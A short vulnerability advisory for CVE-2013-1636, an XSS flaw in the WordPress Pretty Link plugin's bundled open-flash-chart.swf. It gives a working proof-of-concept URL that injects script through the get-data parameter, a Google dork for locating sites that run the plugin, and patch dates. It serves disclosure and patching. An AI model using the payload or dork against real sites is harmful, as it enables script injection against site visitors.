# Exploit Title: Wordpress pretty-link‏ plugin XSS in SWF # Release Date: 20/02/13 # Author: hip [Insight-Labs] # Contact: hip@xxxxxxxxxxxxxxxx | Website: http://insight-labs.org # Software Link: http://downloads.wordpress.org/plugin/pretty-link.1.6.3.zip # Vendor Homepage: http://prettylinkpro.com/ # Tested on: XPsp3 # Affected version: 1.6.3 before # Google Dork: inurl:/wp-content/plugins/pretty-link/ # REF:CVE-2013-1636 ----------------------------------------------------------------------------------------------------------------------- # Introduction: Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name! ------------------------------------------------------------------------------------------------------------------------- # XSS - Proof Of Concept: vulnerable path: /wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf vulnerabile parameter:get-data POC: /wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})() ------------------------------------------------------------------------------------------------------------------------- # Patch: -- Vendor was notified on the 23/01/2013 -- Vendor released version 1.6.3 on 25/01/2013 Fixed the bug -- REF:http://wordpress.org/extend/plugins/pretty-link/changelog/ -------------------------------------------------------------------------------------------------------------------------